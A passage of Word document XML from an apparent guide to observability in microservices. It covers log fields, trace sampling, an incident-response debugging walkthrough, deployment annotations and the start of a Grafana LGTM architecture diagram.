    <w:p w14:paraId="02E1B9DE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   "duration_ms":30000, "pod":"payment-7b8f9-xk2m4"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A42183" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="3BA66A58" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A94F2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Always include trace_id (correlate with traces)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A410619" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Always include entity IDs (user, order, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B939C10" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Always include error details (type, message, code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D6E761" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Always include timing (duration, timestamp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67775EB6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Always include source (service, pod, version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69794A4D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.4 Not Sampling Traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24522C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257158E6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Problem: Storing 100% of traces at 10K RPS = enormous cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086C2D39" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  10K traces/sec × 20 spans/trace × 500 bytes/span = 100 MB/sec = 8.6 TB/day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FA9FE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="28F93749" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Solution: Sample intelligently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCAC654" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Keep 100% of error traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D278A6A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Keep 100% of traces &gt; p99 latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F5CEC3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Keep 1–10% of normal traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109E8E7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0438CC80" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Result: 95% cost reduction while keeping ALL interesting traces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1209F12B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.5 Observability as an Afterthought</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2275A79C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABCCDD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Problem: System built without observability → incident occurs → "we have no visibility."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DEEECF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Adding instrumentation during an outage is too late.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C61B4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="24BCFC73" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Solution: Observability is a REQUIREMENT, not a nice-to-have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D9B40" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Every service MUST expose metrics (RED/USE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA9A710" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Every service MUST emit structured logs with trace context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007AEF3A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Every inter-service call MUST propagate trace headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07383DEB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Every deploy MUST be annotated on dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AC1C8B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Every new feature MUST define its SLIs before launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCFBA01" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="496E280F">
          <v:rect id="_x0000_i6138" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F8EB8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Incident Response — Using Observability in Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2FC9D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 The Debugging Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6691EFB8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A65A23" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>1. DETECT (Alert fires)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DCA099" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   "Order service error rate &gt; 1% for 5 minutes"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1209C3AF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="1BA4C999" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>2. TRIAGE (How bad is it?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD6AED4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Dashboard → 3% error rate, affecting all regions, started 5 min ago</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FDAFFE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Impact: ~300 users/min getting errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405566DC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="2757D99E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>3. IDENTIFY (What's failing?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044581D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Metrics → Errors are on POST /checkout endpoint only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F548F3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Traces → Error traces show timeout on "inventory-service.reserve" span</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC41DB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C775583" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>4. DIAGNOSE (Why is it failing?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29184C19" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Inventory service metrics → latency spike from 5ms → 2000ms at same time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C15D4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Inventory service logs → "Slow query: SELECT ... FROM inventory WHERE sku IN (...)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E2913" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   DB metrics → shard-3 CPU 100%, active queries = 500 (normally 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338AAD8C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="6A30A00F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>5. ROOT CAUSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6679553C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Recent deploy to inventory-service (2 min before errors started)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7CD51" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Diff shows: removed an index hint → query plan changed → full table scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C7332" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C05AE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>6. MITIGATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2A6BF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Rollback inventory-service deploy → errors resolve within 60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3D29D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="3CE3BA29" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>7. FOLLOW-UP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07698ABE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">   Post-mortem: add pre-deploy query plan verification to CI/CD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC5850" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Deployment Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4E53B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076ADF21" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Every deployment should be visible in observability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FEAE89" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="2A7A846E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌─────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39372E74" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Deployment Timeline with Metrics Overlay                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FDDE5A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47DDBD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│  Error Rate:          </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>▁▁▁▁▁▁▁▁▁▁▁██▁▁▁▁▁▁▁</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62127A98" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│  Latency (p99):      </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>▁▁▁▁▁▁▁▁▁▁▁████▁▁▁▁▁</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F5F860" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Deploy marker:               ↑ v2.3.1                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C466EF0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Rollback marker:                    ↑ rollback              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651AD4F6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168D13C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Canary metrics vs baseline:                                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2FCBE8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│    Canary error rate: 5.2%  Baseline: 0.1%  → ROLLBACK      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAE4657" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD673F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="2203A9FB">
          <v:rect id="_x0000_i6139" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFECE9A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Observability at Scale — Production Architectures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D48C74D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 The Grafana Stack (LGTM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C12E19C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B661BA1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌─────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073EB001" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                    Grafana (Visualization)                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF2D8E7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│         Dashboards, Explore, Alerting, Correlations          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177D4C9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>└────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AE5B6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     │              │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BB1D8E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4269B165" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌────────┐    ┌────────┐    ┌────────┐    ┌────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC73D3D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Mimir │    │  Loki  │    │ Tempo  │    │   Pyroscope    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55854D49" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
